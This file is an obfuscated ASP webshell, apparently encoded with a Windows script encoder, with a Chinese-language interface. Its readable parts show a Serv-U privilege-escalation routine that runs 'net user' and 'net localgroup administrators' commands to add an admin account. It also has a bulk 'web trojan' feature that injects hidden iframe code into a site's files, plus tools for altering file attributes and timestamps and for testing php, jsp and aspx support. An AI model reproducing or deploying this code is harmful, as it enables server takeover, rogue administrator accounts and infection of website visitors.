Yc.;~?askD:2~{U#|raUb~K.s`=/DRsvD5EUwskDk2~{PUB=##4W!U[PDW,j;Px~ZsGD,4`bwb|,'PT~BURU*2vt;*?DD`bq6~q K4+ =G; N`:GP`4P{~TPwWMPrYh2*=~K4nxa`rb*kmcOsx;:.&0~&/,=wvk*b#BPO:bwc4!?mmU`;lV^~|2^/=SP=R?:2`bb?DDcO,'P(Uk+n3Xb#PT,K4+3XP@*(0,/n+ =Va,OPB~/+:acr#0D`O1~x,SdYm.Y8Pb|k++Va*#~O,OswcbPd+xvwvr#BtO`D:x~"koUNgPP*|~K4+ +UNHbDrmv(/ Eh~mxN~CMYH#b^v/O Es+D&0,(/#KGPxC.D1P,xPkYsK.~L91##SP%bbwct!jmmxc/mVV~|g+aY#3^/n#4M@*U*:(nD@!WOP E~rkPxg~[,U[,nUNKD,U~P'~?POlMO1"Ijck=2U[,qW=Ask+|(+M@!4DP ;:b/~xKP'~?P:ack*IIUcOD@*U*=3x[~&0|2 [P&0|H6Y|3^/n=4;*~=7`bw`UYM]+BFSq wc4!#Hb[`bDY,x~ka?Dl Ubb#~=O?bwvt;bUYDcr*#Rq ra`4!~d+xvO?b_8t;#BU.cbw`B(xUYwv4;#tk9`r#~OKPb_8SF*~= ?kwc4!D]+7cBqUUYa`t!#trNvka6,'~oKDPXb=KEx9cPW,j(PxPT~wW.PbO:a#|~:t+U2vkb#b^vYh Es+D&0,(/,=O:a`raX6~,.Y,[Pb2jYm?1lU`/C^V~#*|2^/n|BPUR=swck*jDDcDP{Pq /n3X#|PZPP436,@*q6P/nU=06,O~~~d+hwvr#0OcD1Px~d/OlMO8Pb#/+3X#*~O,Yhwvk~Jx`ack*~tDcO:{P"kL+U[gP~##~K4+Un N1bnMk^`&d Eh,l NPmDDH#bmc/Dx;hDq6~qk=KK~nxmDD1~Px~kYoWM~L91|aX6~%.DP'Pb2UYCUmmx`;l^sP*=H+XY|3^/+#8D@*U#s8nD@!WDPUE~rkPU1,'P?[~n NW.~?P~[,=,YCMYgIIU`k|2 N~q6=3sk+=(nD@!4Y,U;:b/,xGP'~?Phwvr#"IjcDD@*=b#2UN,(6=3 N,q0#1aY#1n6D=3U9Pq6|16Y#+~',YDkh+.rs+.=bh+MFn.yOYOcDkhYMcbxh'1/Y4+Dr#*=r:[='Dt+D~k PUK^n/ktM@*KD]]UU@!Pk==A19~&sJSKkWb)U9Pd!4=@#@&=?!8PUmCxvYC.T+Yb2~,wWMOHEs#=rUP3.MW.P"n/!:n~g+6Olk+OP1G x~{PU+D7+M ZM+CYr8%mYvEbGrf~ ^W xmOkGUr#lmKUxkY.xrnDG-bNnD{j5S6d2GAR8iGCYmPjW!D^n{JPL~YmDoOrw,[r~E[~2KDO1!hPLJIik+D~(G'sl0nyiKm/khWMN{IJ=mGx R/G x+1OkKxKbhnW!Y{FlmGU RGwUP1WUUkYDl(6P3DM~:tn )&0PADM x!:8+MPx~ FW{ 8G%Wf~WMPAD.RU;s4nD,xP q*Fcv{+l,~K4n )(6P&x?DDv3DMR[+km.raYkKU~,J`;GUxmD`b# E*P@*PZ~K4+Ul"I?cOmDL+DraP',J=JPLPaGDD1;:,[~EcRRc Rc关闭@!4M@*E#=2^/n)]]U`OlML+Dk2~LPJlE,[~wK.D1;sPLPJcRc RcR@!0KxO~1WVK.'M+N@*开放@!&0KxD@*@!4.@*r#l2 [P&0l3 NP(W=2UN,(6)3 N,?E()UnVmOP;ldn,bmDrW )ZmdnPrHmkUHnU!JlHmrxt+U;v#)/Ck+~JTnDKnM:bxl^q WWr)L+DKn.skxmsq 0WvblZm/PEnCLb[N:GH94Elhlon)9NPWt[(`b=mm/+,JU^l nGDDJlj1lxhGDD`#=/C/ProG4C^0JloK8l13cb=Zldn,Jj+M-!JlUjmmYbW xD;;+kYcEUjl1OkKxJ*@#@&k6P,xGY~rkx;:.k1`jimmYrG #~Y4n P./aWxk+cnx9@#@&Ek+.~{PYMr:vD+$;n/D`rEE#b@#@&wC/k~',Y.rs`Dn5!+dYvEaJb*@#@&wWMY,xPDDr:vDn5!+/DcJaWDDEb#@#@&1:[Px~DDr:v.+$EndD`J^E*#@#@&6xDDrs`M+;!+kO`r0E#*@#@&r6P0{EJ,YtU@#@&6'TwCY4c*@#@&+^d+@#@&Wx^+0Oc6~+#@#@&x[,k6@#@&6Ya2WMY~',vXXZ!@#@&Oks+W!Ox&@#@&^WLkU;k+.P{~J`/n.,JP'~!/nD,',\8;Dd0@#@&VKLk wC/kPx~rnlkdPrP[,2C/kPLP-4/.d0@#@&9nV9WhCbxPx~rO92d3:29}Hzq1rPL~\(Z.S6P'~rOqhx!c!RZ TJ,[,\8Z.J6P'Pr~nKDOHK'J~',0OwaGMY~LP74ZMS6@#@&sY~',Jj(:2Pt)qgK2g)HZAJ,[~\8/MSW@#@&U+SNGhmkx~x,JR?APGr\zqgJPLP78ZMSWPLPERGW:mrx{oW^[dE uZRTRT ZuEPL~0Dw2GMYP'~ruRF-q-!E,[,\4;DdWPLPEO:}63 l4^n'ZJPL~-4;Dd0~[~E,KtrnnX{J~',\4/.d0@#@& nSEdD,'PrOU3K`?3IU2PihJPL~\(ZDdW~[,J qK'T ZRTRZEPLP-8;DSW~LPEOhGMYHK'rP[,0D2wKDOPLP-8;DS6~[,JO`dnD{oKJ~[~-(Z.S6~[,JRKm//AGMNxW9E,[~74;DS6PL~{@#@&EO_WhnGkD{^)'-J,'~\(ZMSWP'~rOJWTrxt+dobV+xE,[~\(/MSW,[,JOGkkC4^+x!rP'~74ZMJ0,[PrR]+^nmY4/xqrP'P78ZMSW~LP{@#@&rOH+[U+^!D'!rPL~\(Z.S6P'~rOCb[+_kN9nU'ZJ,[~\8/MSWPL~J bsAmX/)s^WASKLbxxZJ,[P74;.S6P'PrO/4mxoKlk/hK.['ZJ,[~\8/MSWPL~{@#@&ER5EWOCAxC4^n{!E,[,\4;DdWPLPEOtlaik+DkJWTkxhn.qh' FEP'~74/DdWPLPERUw+n[dkhkDia'TrPLP\(ZMJ0,[~J ?2nNSbhkDfWSUx!rPLP-4/.d0~[,m@#@&JR\m61.ik+./{R8J~LP74ZMS6~[,JRq9VnPb:+};Y{v!ZE~[,\(Z.SW~LPEOUn/kkGU:k:n6!YxO8E,[~74;DS6PL~J 2awbDnxZJPL~\(ZDdW~[,J ICYrG`wxFr~[,\8/MS0~',{@#@&rR"lObWGWh '8EPLP-4;DJW,[PrRImYkKd/DNbYx!E~LP-4;.S6P'~rOp;GDl/EM.xO{!rP[,\(/Dd0~[,JR}!WYm\lXk:!hx!rPLP-4/.d0~[,m@#@&JR\mkxOn lUmxUXdD+sJPLP78ZMSWPLPERhl/kAWMNKH2n'"+TEsl.E,[~\(/Dd0~',JO]CDkG/{HKxnrPLP\(ZMJ0,[~J,b^^//{^)'-u" )HAS;fKJ~',\8ZMJ0@#@&5;bYPx~rpiq:E,[~74;DS6@#@&U+SEd+M'.naVl1n` +h!dnDBJ1)E~Wb@#@&d+^nmDP^Ck+PjimmOkKU@#@&^m/PF@#@&knY,lx?D-nMRZMnlD+r(%nmD`rHrm.GkWWYcpHdCPPhJ#@#@&mRGwU,J!AKr~PrtDOw=z&FyG Tc!R8lJ,[PaG.Y,[,J&oGs9/;xJ;wmNhr z/qEBK.ES,JEBPrJ@#@&lcd+ N~VKorU!/+M~[,VWTrUwm/kP'PhO,[~NsNK:Cr P[~Uh[WsCbx~LP +h!/.PLP5EbY@#@&k+Y,d+k/kKUcJmJ*'C@#@&]"?E@!6GDsPhnDtW[xEwG/Dv,xCs+{BoKV9dE B@*J@#@&]]UJ@!bUw!YP Ch+{B!B~Yz2'vtb[Nxv~bN'v;EP-l^;'vr[!/+M[rv@*@!zON@*J@#@&"I?r@!k wED~Uls+{B2B~OHwn'E4k9NnUEPk[xEwvP7C^En{Br[wm/k'JE@*@!zDN@*E@#@&I"jJ@!kxa;OP ls+xB2GMYvPDzw'v4bNNnUEPrN{vaW.DB,\l^ExBr[2WMY'EE@*@!JON@*J@#@&]]?r@!bx2EO~ lh+{vmEPOza+'v4bN[+ v,k[{B1BP7l^;+{BE[1:['rBPkry'BlTv@*r@#@&I]?E@!bx2ED~xm:nxE0B~OHwn'E4bN[xEPk9'EWB,\CV!+xvr[0LEB,/k.nxBl!E@*E@#@&]"?E@!bUw!Y~Um:+xvUjCmDrKxv,YHw+{B4rN9+UB,k[xE?jm^YbWxE~-l^E'v v@*@!zWWMh@*r@#@&]"?J@!d1DrwD~^lUTEmo+{BNC\m/^DbwOv@*J@#@&]IUJNK^;:xDRADrO`v@!1nxD+.@*正在连接,F { ZRTR8lr[2KDD[JB使用用户名),E[!/nDLJS口令:ELwlkd[rRRc@!^+ YD@*BbIr@#@&I"jJk+OPb:+G;D`vNK^!:n YclV^RTGV9/;xc/;8skYvbiE~cZTT#pJ@#@&]IjE@!zdmMrwD@*E@#@&mldn, @#@&knDP8{?D\Dc/DlO+}4%n1Y`r\k1DWkGWYc(tSuKPKr#@#@&( Wa+U~rM2PEBPEtDOa)&JFyGRZRZ F=J~[,0O2aWDD~[,JzTGsNkE z;wC[skUzk+JBPP.!+~~Er~~Jr@#@&4 k+ NPrjknD,oGJ,[~-(ZDdWPLPJaCd/,W9J~[~-(Z.S6~[,JdrD+Pnam~J,',mh9PLP\(ZMJ0,[~;!kO@#@&/+D~///bGU`r4r#x4@#@&"IjJ@!WWM:~hYtG[{B2WkOEPUm:'BTW^[/!xv@*r@#@&]"?J@!rxaEY,UC:'EEvPOza+xB4rN9+Uv,kNxv!B~\ms!+xEJLE/DLEB@*@!&Y9@*E@#@&IIUE@!bxw!O~xm:'vwv~DX2+{vtbN[n BPr[{B2B,-mV;'EJ[alkd[rB@*@!JY[@*r@#@&"]?r@!k 2;Y,xm:n'v2KDOB,OXa+xv4kN[n B~k9xEwGMYEP\mV!n'EJ'wKDO'rB@*@!&Y9@*J@#@&]IUJ@!kUw;O,xC:xB1B~OHw+xv4k[NUEPr9'EmB,\msE'vJLmh[LJB,dk.+'EXTB@*J@#@&]IjE@!kUw!OP lhn{B0v~DX2+{v4k[9+ BPbN{v0EP-l^EnxEJ[6'JEP/b"n'E*ZB@*J@#@&"IjJ@!rxaEO~ l:nxE?il1ObWUEPDXw'E4k9NnxEPr[{B?`CmDkW v~\mV!+xBfv@*@!&0K.:@*J@#@&"I?E@!km.kaO,VC o!lo'E%l7ldmMk2OE@*J@#@&I"?J9G^Es+ Y h.rD+cB@!8D@*@!^n Y+.@*正在提升权限B请等待R RB@!1+UD+M@*B*ir@#@&"IjJk+OPb:+K;YvJJ9G^Es+ Y lsscoGV9dE Rd;(:kOc*iEJB*Z!T*ir@#@&"IUE@!J/^DbwO@*r@#@&1C/P&@#@&d+DP1'j+.-D ZMnlD+68N+mOcrHrmMGkWWDRoHS_K:KJ*@#@&mcW2n PJV3Kr~Pr4OYa)Jzq { ZRTR8lJ,[~2KDY~',J&oKs9/; z!wl9:bUzk&E~,K.;~PrE~,JJ@#@&^Rk+ N~VGLbx;/.PLPsGTkx2Ck/~[,hDP',NVNK:mrx,[~;!kO@#@&/+D~///bGU`rmr#xm@#@&"IjJ@!^+ Yn.@*提权完毕~已执行了命令:@!8.@*@!WW O,mG^WM'DN@*E[1:[[r@!&WKxY@*@!4M@*@!(.@*J@#@&"IjJ@!r w;Y,OXa+x8!YYGU,\CV!n{B~返回继续,B,Wx;Vb^3{JEVKmCObWxc4D0'E_)mDkKxx?n.7EvirE@*r@#@&]"?J@!&1+UY.@*J@#@&mm/+,+^d+@#@&Gx,+..KDPMn/!:+,Un6D@#@&/nY~C{/n/krW `ECr#@#@&dY~4{d/dbW `J(J*@#@&k+OP1'dnk/kKU`rmJ*@#@&lcl(W.Y@#@&U+OPm~',1GO4kxL@#@&4 l(GMY@#@&?YP(P{~1KY4k o@#@&1Rl(GDD@#@&UnOP1P{PHWO4bxL@#@&]IUJ@!^xYn.@*@!8D@*@!6W.sPs+Y4W9xBaWdYEPUCs+'ELW^N/!Uv@*r@#@&I]?E@!Dl8V~hbNO4{Bc1*EP4+bL4YxEF+&B,4K.NDxB8B~^VVaCN9kxTxv!EP1+sVd2mmrxTxB8B~8KDNn.1WsWMxEa+v+vvE@*r@#@&"IjJ@!Y.~mVkTU'Em+ OnDEP7lskLU{Bhk9[VB@*E@#@&I]jr@!ON,^KVdal 'ByB@*j+M\Rj,提升权限P)jh版@!zD[@*r@#@&"]jJ@!zDD@*J@#@&"IjJ@!OD,lsrTx'v^xO+Mv,\C^kTx'E:b[N^+v@*r@#@&]"?J@!ON,hk9O4'EFZ!v@*用户名l@!JY[@*r@#@&"IjE@!YN~AbNOt{v2G1E@*@!kxaED~xm:n'EEv~DXwxBD+6Dv~k9'EEvP-C^En'EJW1ls)9:kUrkY.lDGMB@*@!zDN@*r@#@&]IUJ@!zDD@*E@#@&I"jJ@!YD,CskTx{B^+UODvP7CVboUxE:k[[^+v@*r@#@&I]UJ@!YN@*口P令:@!&Y9@*E@#@&I]jr@!Y9@*@!bxw!O~xm:'vwv~DX2+{vY6Ov,kNxvaB~\ms!+xEa^@$^m3[ V0iT@$hB@*@!JYN@*E@#@&IIUE@!zDD@*J@#@&]]UJ@!YM~l^kLU{BmnUD+.B,-mVrTx{B:bN9s+E@*E@#@&I]jr@!Y9@*端P口:@!zY9@*E@#@&I"?E@!O[@*@!rxa;Y,xCh'B2GMYvPDza+xEY6YEPb['EwGDDB~-mVExBW&,l0v@*@!zDN@*J@#@&"IjJ@!&YM@*E@#@&IIjE@!Y.PmsboU{B1+xD+MvP7lskTxxvskN9s+E@*J@#@&]IUJ@!Y[@*系统路径:@!&DN@*J@#@&I"?E@!DN@*@!r w;Y,Um:n{B6BPDXan'EYn6DB~r9'B6vP7lV!nxBr[6[EB~dbyn'E0B@*@!&O9@*J@#@&"IjJ@!&DD@*r@#@&IIUJ@!OD,lskTxxv1+xDnDEP\msro 'E:rN[sB@*J@#@&I"?E@!DN@*命M令:@!JY[@*r@#@&I]UJ@!YN@*@!bUw!Y~xm:nxEmB,OXa+'EOn6DB,k['v^EP-l^;+{B^h9Pz^~ +OP!dD~R!k+m,%Zd+1P&l9N~',x+D~VKml^L.W!w,l[:rUb/ODmOWM/~0Z/+^~Jl[NE~kk"'E*!E@*@!&Y9@*E@#@&I]jr@!zD.@*r@#@&"]jJ@!YMPCVrL 'vmUYDv~7lVrL 'v:b[9VnE@*r@#@&"IUE@!DN~mKVd2mx'E+B@*@!k 2;Y,YHwn'vd!4hkDvP lhn{B?;8skOB,-mV;'E提交B@*,J@#@&I"?E@!bx2;DPYH2+{BDdnYEP lh+xvUE8:bO EP-C^E+xv重置E@*E@#@&]"?E@!k wEDP C:'v?`l^ObWxE~YHw+{v4k9NxvPr[{BCmDrW B~-mVEnxEFv@*@!&DN@*r@#@&IIUJ@!&YM@*@!zDl8s@*@!JWWM:@*@!&^+ YD@*J@#@&x[PknVmO@#@&0EU^DkGx,!alO4`*@#@&Kx,nDMW.PM+d;s+P n6D@#@&..R1Vl.@#@&dY~0{j+M\n.cZDnCD+64Nn1Ycr?1DkaYbUocsrV?zdD+:}8LmYrb@#@&b0,+.D U!:8+M@*!,Y4n @#@&L2mY4'r^=J@#@&+XkY,0!UmDkGx@#@&nU9Pk6@#@&TwlD4x0cMYjwn^blssKsNDcT*@#@&L2mY4'^^m/nvV0YvoaCY4~+#*@#@&dYP6xxKYtbUL)x9PWEU^DkGx=@#@&;ldn,JZ2sT:E@#@&oalO4'"+;!+kO`r0[J*@#@&C9NmK[+,'P"n5E/D`EmG[Jb@#@&CN9mG[ Px~"+5EdD`E1W9+ r#@#@&w10rV'.n$E+kO`rwm6rs+r#@#@&^tn^04G6{.+$EndD`J^4mV4Kar#@#@&?4Wht/TxD;;+kYcEUtWS\/TJ#@#@&oKHw'.+5;/O`roKHwnE*@#@&\xM+5EdD`EtJ*@#@&b0,oYHwn'rJ~O4+x,oYHw+{EO6Du4Yhu4OsVklk2uat2kN/wkCkwau1Lbu^D-l/mu1[6r@#@&k6Po2mYt{E-rPY4nUPwwmY4'jnM\nDc\lanCO4`JwE*@#@&k6~wwCDt{JRrPK.PwwCY4'EE,YtUPwwlD4x?D7+.R\CanCY4cJcJb@#@&k0~C9N^W9n{JE,Y4+x,l9[mKNn'r@!rWMl:~/Mm'4OOw=zJF+G Tc! FJhR4Yh~SkNO4{!~trTtO{!@*@!zb0MC:@*E@#@&kW~1t+1V4K6'rE~Y4+ P^tn^04G6{.+$EndD`J^4mV4Kar#@#@&k6Pw10bs+{JEPDtnU@#@&w1Wk^+1mhn'"+$En/O U+.\..mDrC(V+dcr?/I&K:{HzHAJ#@#@&a^0bVn3{/2sbY`a^0bV+gCh+BJJJbP@#@&amWk^nx{E8G!xNc210rVV*P@#@&w10k^+{2m6ks+0`2^6kVU#,@#@&U[Pb0@#@&]Ij~vJ@!A"@*@!(@*网站根目录@!&(@*O~EL?nD7nMR\mwhlY4`r&J*[E@!(D@*E*@#@&"]?,`J@!8@*本程序目录@!J4@*O~J'jD-+M HmwKCDt`E r#b@#@&]"?~r@!6WDsPsnY4W['hrjP@*@!4@*,J,@#@&bW~H{J8J~Y4n P]IUE批量挂马O批量挂马r@#@&r6PHxEyJ~Y4n P]"?r批量清马O清除别人的网马J@#@&bWPt'E&rPO4xP"]?r批量挂马O批量替换代码J@#@&r0,H{JEPO4x~DdwKxdnc+x[@#@&I]?,EY@!&(@*@!Yl(V~hbNOt{FTTuP4K.ND'Z@*@!YM@*@!Y[@*文件路径:@!&DN@*J@#@&I"?~E@!YN@*@!bx2ED~DX2'D+6DP C:'WN,\Cs!+'EE[wwlD4'JEPkk"+x*Z@*~填“-”即网站根目录;“c”为程序所在目录@!zDN@*@!JYD@*E@#@&r0,\{JqrPDt+ P"]?,J@!YM@*@!O9@*过滤重复:@!JON@*@!Y9@*@!k w!Y~msCk/xm,Uls+xv1t+^V(WaB,OHwn{m4+m04KaP7lsE'v^4+m0nNEPJL^4+13(Wa[E@*,防止一个页面中有多个重复的代码@!&Y9@*@!JY.@*r@#@&]]UPE@!D.@*@!O9@*排除文件:@!zY9@*r@#@&"IjPr@!O[@*@!k 2EDPxmhn'Ew10rVnv,YzwxY6O~bN'v210rVv,\C^E'Br[a^0bVn[rB~dby+{*!@*P输入不想被修改的文件名,例如:FcCdw- cldwkfcldw@!&Y9@*@!&DD@*E@#@&I]?,E@!Y.@*@!DN@*文件类型:@!zD[@*r@#@&I"?~E@!YN@*@!k wED~Uls+{BoKz2B~YH2+{YnaDPk[xEsPXanEP-mV!+'EJLoYHwn[rB~dby+{*!@*P输入要修改的文件类型$扩展名Y,例如:4O:-tD:suCdau2takLkwkCkw6k^Tk@!zD[@*@!&DD@*@!YM@*@!ON@*J@#@&b0~\{JFr~Y4+x,]]?r要挂的马:J@#@&r0~\{J+J,Otx~]"?J要清的马:E@#@&kWPtxr&E,Y4+x,I"jJ要替换的代码:r@#@&I"?E@!JYN@*@!Y9@*@!DnaYmDl~xCh'^W9nP1Wsd{vv~.Khd'2@*r[C9N1WN[r@!zD+aYmDnC@*@!zD[@*@!zYM@*E@#@&k6P\'EfrPOtUP"Ij~r@!Y.@*@!Y[@*替换为:@!&DN@*@!Y9@*@!D+XOlM+CP lhn{mW9n ,mW^dxv+PMWA/xf@*J'l9[mKNn+LJ@!&O6OlMnm@*@!JY9@*@!JYM@*J@#@&]IUPE@!DD@*@!ON@*@!zD[@*@!DN@*P@!kU2!Y~xmh+{/;8skY~OHwn'k;(:rDP7lV!+{开始执行@*P O标记解释RO]成功:√P,~排除:×~,,重复:@!0KUY,mW^G.'M+9@*×@!zWG Y@*T@!&Y9@*@!&DD@*E@#@&I]?,E@!zOm4^+@*@!z6GDs@*EP@#@&rW,D+$;+kY`rd;4skDJb'E开始执行E,Y4+ ~@#@&I]jr@!Nr-,/OX^n{BsbxOtkT4Y= XwXB@*@!(@*执行记录:@!J8@*@!4D@*E@#@&1l^V~qUdDOb^ssbVndvswCO4~CN9^KNnBw10k^+*@#@&"IjJ@!z[r7@*J@#@&+ NPbW@#@&kE(PCYOc*@#@&NbhPhlO4Bsksnglh+BHhPb:~?4EorxT@#@&/Y~2mYt{.+$E+kO sKDs`EwCO4FE#@#@&/Y~WbV+HCs+xD5!+dDRwWDs`rWk^+Uls+Eb@#@&/OP +h:rh+{D;;+dOcsGDscJDkhnr#@#@&dY~?4;okUT'M+;!+kORwW.:vJd4!6k LJ*@#@&"]jJ@!0KDhPhnDtGN{2WkY@*E@#@&I]jr路g5径)@!r w;DP l:'E2lDtqB,\Cs!+'EE[q"66KLJ'B~/r"'vvZv@*@!4.&@*J@#@&]"?E文件名称)@!r w;DP l:'6rVxC:P-C^E+{vk N+X C/aB,/rynxEvTB@*@!4Mz@*E@#@&I]jr修改时间)@!k 2!Y~ ls+'DksnP7lsE'vqyz 8& Z!,,+f)l,=*1B~dbyn'E!E@*@!8Mz@*E@#@&I]?r@!k+smDPW Z4CxT+xBDtrdc0WMhRktEXrUoc\mV;+xO4kdR7CV!+Iv@*J@#@&]"?E@!K2DkG P7lV!+{vB@*普通@!&WaYrG @*J@#@&I"?J@!G2YbW P-ls;'vFE@*只读@!JW2ObWx@*E@#@&]IUE@!W2DkKxP7l^;+{B+B@*隐藏@!&GaYkKU@*r@#@&"]jJ@!WaYrWU~7lsExBWB@*系统@!JWwOrKx@*J@#@&"Ijr@!KwYbW ~\mV;+{BffE@*只读存档P@!&WaYkKU@*J@#@&"IjJ@!GaYrW ~\mV;n{B&*v@*隐藏存档P@!zK2DkG @*r@#@&"IUE@!KwOkKx~-mVExB2*B@*只读隐藏存档~@!zKwDkGx@*E@#@&]IUE@!KwOrKxP-C^En'EfOB@*只读隐藏存档系统,@!JWwDkKU@*r@#@&I"?E修改属性:@!bxw!OP l:xdt!6bxLP-C^En'ETB,/r"'BTE@*@!4M&@*J@#@&I"?J@!k 2EDPOXa+xd!4:bOP7lV!nx修改@*r@#@&I]?E@!J0GDs@*J@#@&rWvP`sn `2lD4*@*T*l N`^+ c0bVn1m:nb@*!#mUNvV+ cU+SKb:n#@*T*PbY4nx@#@&jnDP0dG{?nD7nMR/M+mY+}4NnmD`E?1Dr2DkxT sbV+UzdY:}4%+^Or#@#@&UnY,0rs'0dGconYwr^+calDt[6k^n1m:n#@#@&Wr^+RmOYMk4!On/{?4EpkUL@#@&j+D~/4+ss{?+.-D ZMnmYn}4N+mD`rjtVsRzw2sbmlDrW J#@#@&j+DPmw2{2CDtx/4nV^RHCs+?2C1+c/.7+.c:mwwmY4cJcJb#@#@&jnDPla2{6kVxCwa{alOt KmDd+gC:`Wr^+1Ch#@#@&m2a{WbVRHKNbWX9lO+{xnA:k:@#@&"I?r@!&4M@*@!z8D@*修改文件' 4dwp'x(/2Ir[wCO4[Wk^nglh[r[x(/aI[ 4dwp属性完成J@#@&xN,r0@#@&+ [~/!4@#@&WEU^DkGx,2ta`blk+Y~WkWx?.7+.cZM+lD+}8LmO`r?^.bwYbUocsk^njXkY:64%n1YE#=W/KR/.lYnP6Osbs`dD7+Dc:m2wmY4`rYndDRw42J*#Rq.rYJ@!gKCK~m4W,v恭喜服务器支持n_nv_@*@!g24aP2tar 0Gv#Q@*J=IdwKxd+ch.rD+J@!r0Ml:~dD1'D+dY 24w~hb[Y4'1XZPtnrTtO'2TZ@*@!Jk6Dls+@*~J=In/aWUdRhMrYPJ@!8.@*@!4M@*@!w@*@!(D@*@!a@*@!(D@*@!(D@*@!2@*@!8D@*@!1+UD+M@*如果你能看到Y/D w4w正常显示S表示支持n_n@!2@*@!0KUY,mW^G.'M+9否则就是不支持拉"测试完成记得删除!E)3U9PWE ^YbWUl@#@&s;U1YrW ~"x[gEs4+M`trxBHC6*P@#@&"lx9G:by+,@#@&I NgEh4n.{qUYvcHm6~R,HkU~3Pq#,M,IU9`*P_,HbU#,@#@&2 N~o!xmDrW @#@&6;UmDkKx~M2CDtc#@#@&W Pn.MWD~./;:~ +aD@#@&+DMR1s+mD@#@&k+O~6'?.\DR;.nlD+}4%+^OvJjmMrwDkULcsksnUXdYh}4%mDJ#@#@&bWPD.R Eh8D@*Z~Y4+x@#@&LwmY4'EmlE@#@&n6bOP6EU^DkWU@#@&+UN,r6@#@&TwmYt{0c!+D?2+1kCswWV9nDv!#@#@&LwmY4'smCd`s+6O`TwCO4~ bb@#@&d+D~6'UKY4kxT@#@&nx9PWE mOrKx@#@&WE mYbGUPN/a`b)dnDPW/Kx?D-nMRZ.nmYnr(%mOvJUmDbwDrxTRok^+jzkY+s64N+mDEb)6/KR/DnCD+P+XOsbVnck+D-nMRhla2mY4vJD+/DRNdwr#bRqDrOJ恭喜服务器支持Lk2J=I+k2Gxk+ch.kOnr@!r0MC:Pd.1'YndDR%/a~Sk[Dt{,*ZP4nkTtO'2!T@*@!zk6.ls+@*,ElI/aWU/n SDrY~J@!4.@*@!4D@*@!a@*@!4M@*@!w@*@!4M@*@!(D@*@!w@*@!8D@*@!^n Y+M@*如果你能看到Y/Yc%dw正常显示B表示支持Lkw@!w@*@!J0GxD@*@!a@*@!C,tDnW{B_b1ObWU{laLNVE@*@!6WUY,/r"'*,^W^WD{.nN@*删除测试的所有文件`必须全部测试才可以删除B否则会出错"b@!&WKxO@*@!&l@*@!&^xYn.@*Jl2 [,0; mDkW )6;x1YrW PCda6`*l/YP6dG'U+M\nD /M+CY64N+^OvJ?^.bwOk Lcsr^+UX/D+s64N+^Yr#lWkWR;.+mY+:naYwk^+c/n.7+.RsCwalO4vJYndDRC/aar#bcMkYJ恭喜服务器支持mdwXJlI/2G /+cADbY+r@!r0Mls+~/.^{Yn/D lkwa~SkNO4{,X!,4kL4Y{&!Z@*@!&k6DC:@*~E=I+k2W /+cA.kD+,J@!4.@*@!4.@*@!2@*@!4.@*@!w@*@!8M@*@!4M@*@!w@*@!4M@*@!1+ O+M@*如果你能看到P+kY Ckw6正常显示B表示支持C/aRxO@!w@*@!6WUY~^KVGD{.+9@*否则就是不支持拉Z测试完成记得删除!E=2x[~6EUmDrKx@#@&0!xmDkKUPmw%NVcb=/+D~0kW'Un.\DcZ.+COr8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#l0kW 9V+DnsbV+vdnD7+MRhl22mY4`rO+kY Ckw6Eb*)W/K G+sYsk^+vd+M\nDc:C2alY4cJD+/D 2taJ*#l0dGcfnVO+wksnv/+.-D :m2alO4`rY+kYc%/aJb#=DndaWxknRSDkDnE删除完毕"r)Ax[PW; mOkKU)6EU^DkWU~klh`*l"+daW /+chMrYPE@!(D@*@!(D@*@!2@*@!4D@*@!2@*@!4M@*@!4.@*@!w@*@!(.@*@!mnUD+D@*@!(D@*@!(.@*@!WKxDPmKVK.'M+[@*r).nkwW d+chDbOnJ@!mxO+.@*@!0GxD~0mmnxSkxL[bxL/,^KVGM'[!!AZZTPkYzV'WG YOkry) WT2Y@*1@!zWWUO@*@!dwmUP1VCdk'/Oz^+q@*@!dalU,/DXV'6GxDOA+bo4O=P&ZT@*@!0W O~0mm'(:2C1Y~mKsWM':owssoo,/OX^n{0G Y /k.+=~FZ!2Y@*@!&^xY.@*r)2 [~0!x1YrWUl6EUmDrW PLG(lmVc*)d+D~}0dKP{P?D7nDcZ.+mYn6(L+1O`r?mMr2YbxTRoksnUXdYhr(Ln^DJ#@#@&k+OPKWKV[D,'P}0kGRV+O0KV[nM`?d/bWxvEoW^NDKlO4r#b@#@&r0,xGO,W0Gs9+.R&d"WGDsKVND,Otx~@#@&IndaWxknRSDkDn~J@!/1DrwO@*UtGhwGV9+.crJJ']nCY4cK0G^NDRalMnxD0GV9+.bLJJrb@!J/mMr2Y@*J@#@&nVdn,@#@&IdwKxdnchDrOPE@!k^Mk2D@*UtWSsKsNDcJrJ'j//bGxvJsKs[+MnmY4Jb'rJE#@!&/1Dr2D@*J@#@&x[PbW@#@&dY,r0kW{UWDtrxT@#@&dYPKWW^N+MxUWDtbxL@#@&n N~0!UmDkGU@#@&?;8,qU/.Dbs^sbV+k`q2lDtS1W[nBwm*@#@&U+D7n.RUmMk2YPrs+GEDx,O,11O,,1@#@&kWPMrTtOvalY4~8b@!@*JwJ,Y4n PaCY4'aCOt,[r-E@#@&jY~wjr,'~/M+lOn}4%+1OvJj1DbwYbxT sbVn?H/Onsr4NnmDJ#@#@&Gx,+MDGD~./;:~x6O~@#@&?nO,0~', w?6cMYsKV9nDv2lDtb@#@&?+D~01 P{~WR6k^+d@#@&oKD~2m^t,:zWbV+~r PWmy@#@&?nDPw?F,',/DlO+}4%n1Y`rjmMkwDrUocsbVn?zdD+hr(%+1YEb@#@&sPza+q'k2^kOv:H0k^+cUls+SJcJb~@#@&s:zw '!8GE NvsPX2n8#~@#@&r0,sOza+ @*T,Y4+ @#@&sPHw&'dZmd+vsPXa+qcwKXan *#P@#@&nVk+@#@&oKz2&xJ无r@#@&x[~b0@#@&r6P(xkOM`J;lk+`am*SS;ld+v:zWbV+cUls+#*xTPmx9P(xdOM`JZmd+vsPza+#So:X2+2b@!@*T,Y4+x@#@&knVmOP1ldn,H@#@&^lk+PrqE@#@&k6P^tn^04G6@!@*J1tn^0+NE~Dtnx@#@&U+O,Y6kV'wjFcW2+ YnaD0k^n`qwlD4'Jr[sXWksncxC:S%BO+b@#@&YWr^+ hMrD+sbxP1W9n@#@&I]?r√PE'qwlD4[sX0bsnR ls+@#@&OWbVnR1sWk+@#@&V/n@#@&?nY,O6ksF{s?8RK2+ Yn6D0rs`aCY4[Jr'hX6k^+ xCh~q~ +#@#@&rW,qxdOM`O0bsF M+mNl^VB mKNn#{!~O4+x@#@&?YPDWrV'w?qRG2xO+XO0bVncqwlO4LJE[sz6ksR l:~RSOy#@#@&D0rsRhMrYVk 